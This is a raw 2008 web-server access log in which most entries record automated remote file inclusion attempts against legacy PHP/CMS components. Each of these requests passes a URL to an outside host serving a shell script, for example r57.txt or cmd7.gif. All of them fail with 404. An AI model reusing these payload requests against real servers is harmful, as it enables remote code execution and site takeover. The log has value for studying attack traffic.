89.218.85.18 - - [02/Mar/2008:16:01:11 -0800] "GET /logs/scripts.log/index.php3?id=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:01:12 -0800] "GET /index.php3?id=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:01:12 -0800] "GET /logs/index.php3?id=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.193.215.56 - - [02/Mar/2008:16:01:56 -0800] "GET //ws/get_reminders.php?includedir=http://h1.ripway.com/mybeta/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
213.193.215.56 - - [02/Mar/2008:16:01:57 -0800] "GET /logs//ws/get_reminders.php?includedir=http://h1.ripway.com/mybeta/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
72.30.216.91 - - [02/Mar/2008:16:03:00 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.22.25 - - [02/Mar/2008:16:03:01 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "toulouseangloexchange.com"
74.6.28.167 - - [02/Mar/2008:16:03:01 -0800] "GET /logs/access_080211.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "toulouseangloexchange.com"
12.189.10.194 - - [02/Mar/2008:16:03:32 -0800] "GET /logs/access_080127.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:04:25 -0800] "GET /index.php3?p=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:04:30 -0800] "GET /logs/access_080211.log/index.php3?p=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:04:31 -0800] "GET /index.php3?p=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:04:31 -0800] "GET /logs/index.php3?p=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.133.27 - - [02/Mar/2008:16:05:22 -0800] "GET /logs/access_080211.log/administrator/templates/com_weblinks/admin.weblinks.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.133.27 - - [02/Mar/2008:16:05:22 -0800] "GET /logs/administrator/templates/com_weblinks/admin.weblinks.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.55.147.52 - - [02/Mar/2008:16:07:08 -0800] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.55.147.52 - - [02/Mar/2008:16:07:08 -0800] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.55.147.52 - - [02/Mar/2008:16:07:09 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
122.248.38.3 - - [02/Mar/2008:16:09:19 -0800] "GET /logs/access_080211.log//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
122.248.38.3 - - [02/Mar/2008:16:09:19 -0800] "GET //plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
122.248.38.3 - - [02/Mar/2008:16:09:20 -0800] "GET /logs//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
163.27.110.158 - - [02/Mar/2008:16:09:24 -0800] "GET /logs/access_080211.log//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
163.27.110.158 - - [02/Mar/2008:16:09:25 -0800] "GET //plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
163.27.110.158 - - [02/Mar/2008:16:09:26 -0800] "GET /logs//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.138.206.219 - - [02/Mar/2008:16:10:10 -0800] "GET /logs//load_lang.php?_SERWEB[configdir]=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
193.138.206.219 - - [02/Mar/2008:16:10:12 -0800] "GET //load_lang.php?_SERWEB[configdir]=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
88.217.16.95 - - [02/Mar/2008:16:11:10 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
88.217.16.95 - - [02/Mar/2008:16:11:11 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
122.248.38.3 - - [02/Mar/2008:16:11:40 -0800] "GET /logs/access_071203.log//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:11:47 -0800] "GET /logs/access_080211.log/index.php3?p=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:11:47 -0800] "GET /index.php3?p=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:11:47 -0800] "GET /logs/index.php3?p=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:11:55 -0800] "GET /logs/scripts.log/index.php3?id=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:11:55 -0800] "GET /index.php3?id=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:11:56 -0800] "GET /logs/index.php3?id=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
163.27.110.158 - - [02/Mar/2008:16:12:11 -0800] "GET /logs/access_071203.log//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.176.226.120 - - [02/Mar/2008:16:12:13 -0800] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.amdgchoir.com/phpbb/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
80.176.226.120 - - [02/Mar/2008:16:12:14 -0800] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.amdgchoir.com/phpbb/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
80.176.226.120 - - [02/Mar/2008:16:12:14 -0800] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.amdgchoir.com/phpbb/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.158.16.11 - - [02/Mar/2008:16:13:14 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.55.148.27 - - [02/Mar/2008:16:13:22 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
201.77.209.86 - - [02/Mar/2008:16:13:32 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_080211.log//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.77.209.86 - - [02/Mar/2008:16:13:32 -0800] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.77.209.86 - - [02/Mar/2008:16:13:33 -0800] "GET /logs/%3Cwbr%20//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.138.206.219 - - [02/Mar/2008:16:13:38 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
193.138.206.219 - - [02/Mar/2008:16:13:39 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
80.25.230.39 - - [02/Mar/2008:16:13:51 -0800] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.portal.apescar.net///includes/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.25.230.39 - - [02/Mar/2008:16:13:59 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.portal.apescar.net///includes/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.176.226.120 - - [02/Mar/2008:16:14:50 -0800] "GET /logs/access_071203.log/admincp/auth/checklogin.php?cfgProgDir=http://www.amdgchoir.com/phpbb/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
193.138.206.219 - - [02/Mar/2008:16:14:54 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://deniamusic.com/keplek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
82.160.16.3 - - [02/Mar/2008:16:16:27 -0800] "GET //load_lang.php?_SERWEB[configdir]=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
82.160.16.3 - - [02/Mar/2008:16:16:28 -0800] "GET /logs//load_lang.php?_SERWEB[configdir]=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
82.160.16.3 - - [02/Mar/2008:16:18:16 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
82.160.16.3 - - [02/Mar/2008:16:18:17 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
190.54.28.163 - - [02/Mar/2008:16:18:49 -0800] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
190.54.28.163 - - [02/Mar/2008:16:18:54 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.228.68.244 - - [02/Mar/2008:16:19:52 -0800] "GET /logs/access_080211.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ghs-ostheim.de//starnet/modules/sn_forum/forumpostsize.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.228.68.244 - - [02/Mar/2008:16:19:52 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ghs-ostheim.de//starnet/modules/sn_forum/forumpostsize.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.228.68.244 - - [02/Mar/2008:16:19:58 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ghs-ostheim.de//starnet/modules/sn_forum/forumpostsize.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
203.157.182.9 - - [02/Mar/2008:16:20:05 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.formula.altervista.org/php5/r57.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
203.157.182.9 - - [02/Mar/2008:16:20:05 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.formula.altervista.org/php5/r57.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:21:17 -0800] "GET /logs/scripts.log/index.php3?l=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:21:18 -0800] "GET /index.php3?l=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:21:18 -0800] "GET /logs/index.php3?l=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.55.148.27 - - [02/Mar/2008:16:21:22 -0800] "GET /logs/access_071126.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.55.148.27 - - [02/Mar/2008:16:21:22 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.55.148.27 - - [02/Mar/2008:16:21:31 -0800] "GET /logs/access_080211.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.30.216.98 - - [02/Mar/2008:16:22:47 -0800] "GET /logs/access.log HTTP/1.0" 200 15824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
72.55.148.27 - - [02/Mar/2008:16:23:57 -0800] "GET /oneadmin/adminfoot.php?path[docroot]=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.218.85.18 - - [02/Mar/2008:16:24:04 -0800] "GET /logs/access_080114.log/index.php3?id=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.146.40.49 - - [02/Mar/2008:16:27:07 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://sdcafe.com/im/includes/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
122.248.38.3 - - [02/Mar/2008:16:27:23 -0800] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
122.248.38.3 - - [02/Mar/2008:16:27:24 -0800] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
122.248.38.3 - - [02/Mar/2008:16:27:24 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.theheretics.net/files/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.36.169.130 - - [02/Mar/2008:16:28:14 -0800] "GET /logs/access_071231.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
65.36.169.130 - - [02/Mar/2008:16:28:14 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
65.36.169.130 - - [02/Mar/2008:16:28:14 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:29:03 -0800] "GET /logs/access_080114.log/index.php3?id=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:29:31 -0800] "GET /logs/scripts.log/index.php3?l=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:29:31 -0800] "GET /index.php3?l=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.197.68.66 - - [02/Mar/2008:16:29:32 -0800] "GET /logs/index.php3?l=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:30:51 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:30:52 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:30:52 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:31:20 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:31:21 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:31:21 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.20.119.33 - - [02/Mar/2008:16:31:30 -0800] "GET /include/config.inc.php?include_path=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
217.20.119.33 - - [02/Mar/2008:16:31:30 -0800] "GET /logs/include/config.inc.php?include_path=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:16:34:02 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:16:34:02 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:16:34:02 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:16:34:02 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:16:34:03 -0800] "GET //modules/xfsection/modify.php?dir_module=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:16:34:03 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
80.176.226.120 - - [02/Mar/2008:16:34:17 -0800] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.discoverrussellville.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
80.176.226.120 - - [02/Mar/2008:16:34:17 -0800] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.discoverrussellville.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
80.176.226.120 - - [02/Mar/2008:16:34:18 -0800] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.discoverrussellville.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:35:02 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
65.36.169.130 - - [02/Mar/2008:16:35:33 -0800] "GET /logs/access.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:35:43 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:35:43 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:16:35:44 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.176.226.120 - - [02/Mar/2008:16:36:31 -0800] "GET /logs/access_071203.log/admincp/auth/checklogin.php?cfgProgDir=http://www.discoverrussellville.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.195.44.108 - - [02/Mar/2008:16:36:44 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
72.55.148.27 - - [02/Mar/2008:16:37:16 -0800] "GET /logs/access_071210.log/oneadmin/adminfoot.php?path[docroot]=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.55.148.27 - - [02/Mar/2008:16:37:16 -0800] "GET /logs/oneadmin/adminfoot.php?path[docroot]=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.195.44.106 - - [02/Mar/2008:16:37:32 -0800] "GET /logs/access.log HTTP/1.0" 200 25382 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
